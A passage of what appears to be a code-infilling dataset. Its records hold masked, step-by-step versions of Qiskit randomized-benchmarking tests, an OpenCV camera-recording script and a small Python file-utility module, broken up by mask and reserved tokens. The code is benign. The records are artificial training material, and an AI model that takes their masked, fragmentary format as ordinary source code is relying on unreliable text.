twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5], [0, 1, \n -1], [0.001, 0.0015, 0.02])\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n 'Error: 2Q EPC Calculation')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestRB(unittest.TestCase):\n \"\"\" The test class \"\"\"\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n \"\"\"\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n \"\"\"\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq - 1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n \"\"\"\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n \"\"\"\n if mult_opt == 0:\n res = 1\n else:\n res = [(i + 1) for i in range(len_pattern)]\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n \"\"\"\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the specification that generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n \"\"\"\n if not hasattr(rb_opts['length_multiplier'], '__len__'):\n rb_opts['length_multiplier'] = [rb_opts['length_multiplier'] for\n i in range(len(rb_opts['rb_pattern']))]\n ops = circ.data\n op_index = 0\n for _ in range(vec_len):\n for pat_index in range(len(rb_opts['rb_pattern'])):\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n while ops[op_index].name != 'barrier':\n self.assertTrue(all(x[1] in rb_opts['rb_pattern'][\n pat_index] for x in ops[op_index].qargs),\n 'Error: operation acts on incorrect qubits')\n op_index += 1\n op_index += 1\n self.assertEqual(result.get_counts(circ)['{0:b}'.format(0).zfill(nq\n )], shots, \n 'Error: %d qubit RB does not return the ground state back to the ground state'\n % nq)\n\n def test_rb(self):\n \"\"\" Main function of the test \"\"\"\n backend = qiskit.Aer.get_backend('qasm_simulator')\n nq_list = [1, 2]\n for nq in nq_list:\n print('Testing %d qubit RB' % nq)\n for pattern_type in range(2):\n for multiplier_type in range(2):\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(pattern_type,\n nq)\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = (\n 'Skipping tests for %s qubits because tables are missing'\n % str(nq))\n print(skip_msg)\n continue\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for seed in range(rb_opts['nseeds']):\n result.append(qiskit.execute(rb_circs[seed],\n backend=backend, basis_gates=basis_gates, shots\n =shots).result())\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n self.assertEqual(rb_circs[seed][circ_index].\n name, 'rb_seed_%s_length_%s' % (str(seed),\n str(vec_len)), 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts, vec_len, result[seed], shots)\n self.assertEqual(circ_index, len(rb_circs),\n 'Error: additional circuits exist')\n\n def test_rb_utils(self):\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n t1 = 100.0\n t2 = 100.0\n gate2Q = 0.5\n gate1Q = 0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1], [t2,\n t2], gate2Q)\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1], [t2], gate1Q)\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n 'Error: 1Q Coherence Limit')\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n 'Error: 2Q Coherence Limit')\n twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5], [0, 1, \n -1], [0.001, 0.0015, 0.02])\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n 'Error: 2Q EPC Calculation')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport unittest\nimport random\nimport qiskit\nimport qiskit.ignis.verification.randomized_benchmarking as rb\n\n\nclass TestRB(unittest.TestCase):\n \"\"\" The test class \"\"\"\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n \"\"\"\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n \"\"\"\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq - 1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n \"\"\"\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n \"\"\"\n if mult_opt == 0:\n res = 1\n else:\n res = [(i + 1) for i in range(len_pattern)]\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n \"\"\"\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the specification that generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n \"\"\"\n if not hasattr(rb_opts['length_multiplier'], '__len__'):\n rb_opts['length_multiplier'] = [rb_opts['length_multiplier'] for\n i in range(len(rb_opts['rb_pattern']))]\n ops = circ.data\n op_index = 0\n for _ in range(vec_len):\n for pat_index in range(len(rb_opts['rb_pattern'])):\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n while ops[op_index].name != 'barrier':\n self.assertTrue(all(x[1] in rb_opts['rb_pattern'][\n pat_index] for x in ops[op_index].qargs),\n 'Error: operation acts on incorrect qubits')\n op_index += 1\n op_index += 1\n self.assertEqual(result.get_counts(circ)['{0:b}'.format(0).zfill(nq\n )], shots, \n 'Error: %d qubit RB does not return the ground state back to the ground state'\n % nq)\n\n def test_rb(self):\n \"\"\" Main function of the test \"\"\"\n backend = qiskit.Aer.get_backend('qasm_simulator')\n nq_list = [1, 2]\n for nq in nq_list:\n print('Testing %d qubit RB' % nq)\n for pattern_type in range(2):\n for multiplier_type in range(2):\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(pattern_type,\n nq)\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = (\n 'Skipping tests for %s qubits because tables are missing'\n % str(nq))\n print(skip_msg)\n continue\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for seed in range(rb_opts['nseeds']):\n result.append(qiskit.execute(rb_circs[seed],\n backend=backend, basis_gates=basis_gates, shots\n =shots).result())\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n self.assertEqual(rb_circs[seed][circ_index].\n name, 'rb_seed_%s_length_%s' % (str(seed),\n str(vec_len)), 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts, vec_len, result[seed], shots)\n self.assertEqual(circ_index, len(rb_circs),\n 'Error: additional circuits exist')\n\n def test_rb_utils(self):\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n t1 = 100.0\n t2 = 100.0\n gate2Q = 0.5\n gate1Q = 0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1], [t2,\n t2], gate2Q)\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1], [t2], gate1Q)\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n 'Error: 1Q Coherence Limit')\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n 'Error: 2Q Coherence Limit')\n twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5], [0, 1, \n -1], [0.001, 0.0015, 0.02])\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n 'Error: 2Q EPC Calculation')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Copyright 2019, IBM.\n#\n# This source code is licensed under the Apache License, Version 2.0 found in\n# the LICENSE.txt file in the root directory of this source tree.\n\n# pylint: disable=undefined-loop-variable\n\n\"\"\"\nRun through RB for different qubit numbers to check that it's working\nand that it returns the identity\n\"\"\"\n\nimport unittest\nimport random\nimport qiskit\nimport qiskit.ignis.verification.randomized_benchmarking as rb\n\n\nclass TestRB(unittest.TestCase):\n \"\"\" The test class \"\"\"\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n '''\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n '''\n\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq-1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n '''\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n '''\n if mult_opt == 0:\n res = 1\n else:\n res = [i + 1 for i in range(len_pattern)]\n\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n '''\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the specification that generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n '''\n\n if not hasattr(rb_opts['length_multiplier'], \"__len__\"):\n rb_opts['length_multiplier'] = [\n rb_opts['length_multiplier'] for i in range(\n len(rb_opts['rb_pattern']))]\n\n ops = circ.data\n op_index = 0\n # for each cycle (the sequence should consist of vec_len cycles)\n for _ in range(vec_len):\n # for each component of the pattern...\n for pat_index in range(len(rb_opts['rb_pattern'])):\n # for each Clifford...\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n # for each basis gate...\n while ops[op_index].name != 'barrier':\n # Verify that the gate acts on the correct qubits\n # This happens if the sequence is composed of the\n # correct sub-sequences, as specified by vec_len and\n # rb_opts\n self.assertTrue(\n all(x[1] in rb_opts['rb_pattern'][pat_index]\n for x in ops[op_index].qargs),\n \"Error: operation acts on incorrect qubits\")\n op_index += 1\n # increment because of the barrier gate\n op_index += 1\n # check if the ground state returns\n self.assertEqual(result.\n get_counts(circ)['{0:b}'.format(0).zfill(nq)], shots,\n \"Error: %d qubit RB does not return the \\\n ground state back to the ground state\" % nq)\n\n def test_rb(self):\n \"\"\" Main function of the test \"\"\"\n\n # Load simulator\n backend = qiskit.Aer.get_backend('qasm_simulator')\n\n # Test up to 2 qubits\n nq_list = [1, 2]\n\n for nq in nq_list:\n\n print(\"Testing %d qubit RB\" % nq)\n\n for pattern_type in range(2):\n for multiplier_type in range(2):\n # See documentation of choose_pattern for the meaning of\n # the different pattern types\n\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(\n pattern_type, nq)\n # if the pattern type is not relevant for nq\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n\n # Generate the sequences\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = ('Skipping tests for %s qubits because '\n 'tables are missing' % str(nq))\n print(skip_msg)\n continue\n\n # Perform an ideal execution on the generated sequences\n # basis_gates = ['u1','u2','u3','cx'] # use U, CX for now\n # Shelly: changed format to fit qiskit current version\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for seed in range(rb_opts['nseeds']):\n result.append(\n qiskit.execute(rb_circs[seed], backend=backend,\n basis_gates=basis_gates,\n shots=shots).result())\n\n # Verify the generated sequences\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n\n self.assertEqual(\n rb_circs[seed][circ_index].name,\n 'rb_seed_%s_length_%s' % (\n str(seed), str(vec_len)),\n 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts,\n vec_len, result[seed], shots)\n\n self.assertEqual(circ_index, len(rb_circs),\n \"Error: additional circuits exist\")\n\n def test_rb_utils(self):\n\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n\n t1 = 100.\n t2 = 100.\n gate2Q = 0.5\n gate1Q = 0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1],\n [t2, t2], gate2Q)\n\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1],\n [t2], gate1Q)\n\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n \"Error: 1Q Coherence Limit\")\n\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n \"Error: 2Q Coherence Limit\")\n\n twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5],\n [0, 1, -1],\n [0.001, 0.0015, 0.02])\n\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n \"Error: 2Q EPC Calculation\")\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if type(video_path).__name__ == 'str':
videoReader = cv2.VideoCapture(video_path)
print('Load live video from file...')
elif type(video_path).__name__ == 'int':
videoReader = cv2.VideoCapture(video_path)
print('Get live video from camera...')
if videoReader.isOpened():
print('Camera staus ready...')
else:
print('Camera status fault...')
exit()
<|reserved_special_token_0|>
print('Live Video FPS: ', video_fps)
<|reserved_special_token_0|>
print('Live Video Size: ', video_size)
<|reserved_special_token_0|>
while videoReader.isOpened():
success, frame = videoReader.read()
if success:
print('Live Video Frame Shape: {}'.format(frame.shape))
cv2.putText(frame, 'Live Camera', (470, 30), cv2.
FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)
cv2.namedWindow('Live Video', 0)
cv2.imshow('Live Video', frame)
videoWriter.write(frame)
cv2.waitKey(20)
if cv2.waitKey(1) & 255 == ord('q'):
break
else:
continue
videoReader.release()
videoWriter.release()
cv2.destroyAllWindows()
print('Live Video Done.')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
video_path = 0
if type(video_path).__name__ == 'str':
videoReader = cv2.VideoCapture(video_path)
print('Load live video from file...')
elif type(video_path).__name__ == 'int':
videoReader = cv2.VideoCapture(video_path)
print('Get live video from camera...')
if videoReader.isOpened():
print('Camera staus ready...')
else:
print('Camera status fault...')
exit()
video_fps = videoReader.get(cv2.CAP_PROP_FPS)
print('Live Video FPS: ', video_fps)
video_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)
video_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)
video_size = int(video_width), int(video_height)
print('Live Video Size: ', video_size)
videoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P',
'4', '2'), int(video_fps), video_size)
while videoReader.isOpened():
success, frame = videoReader.read()
if success:
print('Live Video Frame Shape: {}'.format(frame.shape))
cv2.putText(frame, 'Live Camera', (470, 30), cv2.
FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)
cv2.namedWindow('Live Video', 0)
cv2.imshow('Live Video', frame)
videoWriter.write(frame)
cv2.waitKey(20)
if cv2.waitKey(1) & 255 == ord('q'):
break
else:
continue
videoReader.release()
videoWriter.release()
cv2.destroyAllWindows()
print('Live Video Done.')
<|reserved_special_token_1|>
import sys, os
import cv2
video_path = 0
if type(video_path).__name__ == 'str':
videoReader = cv2.VideoCapture(video_path)
print('Load live video from file...')
elif type(video_path).__name__ == 'int':
videoReader = cv2.VideoCapture(video_path)
print('Get live video from camera...')
if videoReader.isOpened():
print('Camera staus ready...')
else:
print('Camera status fault...')
exit()
video_fps = videoReader.get(cv2.CAP_PROP_FPS)
print('Live Video FPS: ', video_fps)
video_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)
video_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)
video_size = int(video_width), int(video_height)
print('Live Video Size: ', video_size)
videoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P',
'4', '2'), int(video_fps), video_size)
while videoReader.isOpened():
success, frame = videoReader.read()
if success:
print('Live Video Frame Shape: {}'.format(frame.shape))
cv2.putText(frame, 'Live Camera', (470, 30), cv2.
FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)
cv2.namedWindow('Live Video', 0)
cv2.imshow('Live Video', frame)
videoWriter.write(frame)
cv2.waitKey(20)
if cv2.waitKey(1) & 255 == ord('q'):
break
else:
continue
videoReader.release()
videoWriter.release()
cv2.destroyAllWindows()
print('Live Video Done.')
<|reserved_special_token_1|>
import sys, os
import cv2
# set the video reader
video_path = 0 # camera number index
# video_path = "/home/pacific/Documents/Work/Projects/Workflows/server/PycharmProjects/Pacific_AvatarGame_Host/humanpose_2d/LiveCamera/test.mp4" # real video file
if type(video_path).__name__ == "str":
videoReader = cv2.VideoCapture(video_path)
print("Load live video from file...")
elif type(video_path).__name__ == "int":
videoReader = cv2.VideoCapture(video_path)
print("Get live video from camera...")
if videoReader.isOpened():
print("Camera staus ready...")
else:
print("Camera status fault...")
exit()
video_fps = videoReader.get(cv2.CAP_PROP_FPS)
print("Live Video FPS: ", video_fps)
video_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)
video_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)
video_size = (int(video_width), int(video_height))
print("Live Video Size: ", video_size)
# set the video writer
videoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P', '4', '2'), int(video_fps), video_size)
# read and write the video frame
while videoReader.isOpened():
success, frame = videoReader.read()
if success:
# show the video frame
print("Live Video Frame Shape: {}".format(frame.shape))
cv2.putText(frame, "Live Camera", (470,30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,255,255), 2)
cv2.namedWindow("Live Video", 0)
cv2.imshow("Live Video", frame)
# save the video frame
videoWriter.write(frame)
cv2.waitKey(20) # wait 20 ms for next frame of the live video
# check whether manual exit command entered
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
continue
videoReader.release()
videoWriter.release()
cv2.destroyAllWindows()
print("Live Video Done.")
|
flexible
|
{
"blob_id": "08408cf096bbe23f9a832cc0cf2e017abdbd359f",
"index": 4591,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif type(video_path).__name__ == 'str':\n videoReader = cv2.VideoCapture(video_path)\n print('Load live video from file...')\nelif type(video_path).__name__ == 'int':\n videoReader = cv2.VideoCapture(video_path)\n print('Get live video from camera...')\nif videoReader.isOpened():\n print('Camera staus ready...')\nelse:\n print('Camera status fault...')\n exit()\n<mask token>\nprint('Live Video FPS: ', video_fps)\n<mask token>\nprint('Live Video Size: ', video_size)\n<mask token>\nwhile videoReader.isOpened():\n success, frame = videoReader.read()\n if success:\n print('Live Video Frame Shape: {}'.format(frame.shape))\n cv2.putText(frame, 'Live Camera', (470, 30), cv2.\n FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)\n cv2.namedWindow('Live Video', 0)\n cv2.imshow('Live Video', frame)\n videoWriter.write(frame)\n cv2.waitKey(20)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n continue\nvideoReader.release()\nvideoWriter.release()\ncv2.destroyAllWindows()\nprint('Live Video Done.')\n",
"step-3": "<mask token>\nvideo_path = 0\nif type(video_path).__name__ == 'str':\n videoReader = cv2.VideoCapture(video_path)\n print('Load live video from file...')\nelif type(video_path).__name__ == 'int':\n videoReader = cv2.VideoCapture(video_path)\n print('Get live video from camera...')\nif videoReader.isOpened():\n print('Camera staus ready...')\nelse:\n print('Camera status fault...')\n exit()\nvideo_fps = videoReader.get(cv2.CAP_PROP_FPS)\nprint('Live Video FPS: ', video_fps)\nvideo_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)\nvideo_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)\nvideo_size = int(video_width), int(video_height)\nprint('Live Video Size: ', video_size)\nvideoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P',\n '4', '2'), int(video_fps), video_size)\nwhile videoReader.isOpened():\n success, frame = videoReader.read()\n if success:\n print('Live Video Frame Shape: {}'.format(frame.shape))\n cv2.putText(frame, 'Live Camera', (470, 30), cv2.\n FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)\n cv2.namedWindow('Live Video', 0)\n cv2.imshow('Live Video', frame)\n videoWriter.write(frame)\n cv2.waitKey(20)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n continue\nvideoReader.release()\nvideoWriter.release()\ncv2.destroyAllWindows()\nprint('Live Video Done.')\n",
"step-4": "import sys, os\nimport cv2\nvideo_path = 0\nif type(video_path).__name__ == 'str':\n videoReader = cv2.VideoCapture(video_path)\n print('Load live video from file...')\nelif type(video_path).__name__ == 'int':\n videoReader = cv2.VideoCapture(video_path)\n print('Get live video from camera...')\nif videoReader.isOpened():\n print('Camera staus ready...')\nelse:\n print('Camera status fault...')\n exit()\nvideo_fps = videoReader.get(cv2.CAP_PROP_FPS)\nprint('Live Video FPS: ', video_fps)\nvideo_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)\nvideo_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)\nvideo_size = int(video_width), int(video_height)\nprint('Live Video Size: ', video_size)\nvideoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P',\n '4', '2'), int(video_fps), video_size)\nwhile videoReader.isOpened():\n success, frame = videoReader.read()\n if success:\n print('Live Video Frame Shape: {}'.format(frame.shape))\n cv2.putText(frame, 'Live Camera', (470, 30), cv2.\n FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)\n cv2.namedWindow('Live Video', 0)\n cv2.imshow('Live Video', frame)\n videoWriter.write(frame)\n cv2.waitKey(20)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n continue\nvideoReader.release()\nvideoWriter.release()\ncv2.destroyAllWindows()\nprint('Live Video Done.')\n",
"step-5": "import sys, os\nimport cv2\n\n\n# set the video reader\nvideo_path = 0 # camera number index\n# video_path = \"/home/pacific/Documents/Work/Projects/Workflows/server/PycharmProjects/Pacific_AvatarGame_Host/humanpose_2d/LiveCamera/test.mp4\" # real video file\nif type(video_path).__name__ == \"str\":\n videoReader = cv2.VideoCapture(video_path)\n print(\"Load live video from file...\")\nelif type(video_path).__name__ == \"int\":\n videoReader = cv2.VideoCapture(video_path)\n print(\"Get live video from camera...\")\n\nif videoReader.isOpened():\n print(\"Camera staus ready...\")\nelse:\n print(\"Camera status fault...\")\n exit()\n\nvideo_fps = videoReader.get(cv2.CAP_PROP_FPS)\nprint(\"Live Video FPS: \", video_fps)\n\nvideo_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)\nvideo_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)\nvideo_size = (int(video_width), int(video_height))\nprint(\"Live Video Size: \", video_size)\n\n# set the video writer\nvideoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P', '4', '2'), int(video_fps), video_size)\n\n# read and write the video frame\nwhile videoReader.isOpened():\n success, frame = videoReader.read()\n if success:\n # show the video frame\n print(\"Live Video Frame Shape: {}\".format(frame.shape))\n cv2.putText(frame, \"Live Camera\", (470,30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,255,255), 2)\n cv2.namedWindow(\"Live Video\", 0)\n cv2.imshow(\"Live Video\", frame)\n\n # save the video frame\n videoWriter.write(frame)\n cv2.waitKey(20) # wait 20 ms for next frame of the live video\n\n # check whether manual exit command entered\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n continue\n\nvideoReader.release()\nvideoWriter.release()\ncv2.destroyAllWindows()\nprint(\"Live Video Done.\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os
import json
def load_json_if_exists(path):
if not os.path.isfile(path):
return {}
with open(path) as f:
return json.load(f)
def json_dump(obj, file_path):
with open(file_path, 'w') as f:
json.dump(obj, f)
def get_folder_paths(directory):
return [os.path.join(directory, f) for f in os.listdir(directory) if os.path.isdir(os.path.join(directory, f))]
def file_to_lines(file_path):
if len(file_path) == 0:
return []
with open(file_path) as f:
lines = list(f.read().splitlines())
return lines
def get_repo_path(file_path):
if os.path.isfile(file_path):
folder_path = os.path.abspath(os.path.join(file_path, os.pardir))
else:
folder_path = file_path
for i in range(100):
if folder_path == '/':
return None
if is_repo_path(folder_path):
break
folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))
return folder_path
def is_repo_path(path):
return os.path.isdir(path) and '.git' in os.listdir(path)
class LineNumberTracker:
'''
When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,
'''
def __init__(self):
self._log = []
def transform(self, line_num):
for is_add, start, end in self._log:
if line_num < start:
pass
elif line_num < end and not is_add:
assert False, 'Line Deleted: {} {}'.format(line_num, self._log)
else:
if is_add:
line_num += (end - start)
else:
line_num -= (end - start)
return line_num
def remove_lines(self, start, end):
self._log.append((False, start, end))
def add_lines(self, start, end):
self._log.append((True, start, end))
|
normal
|
{
"blob_id": "3788888a17e2598e781803f89cd63ac9c3219f59",
"index": 4341,
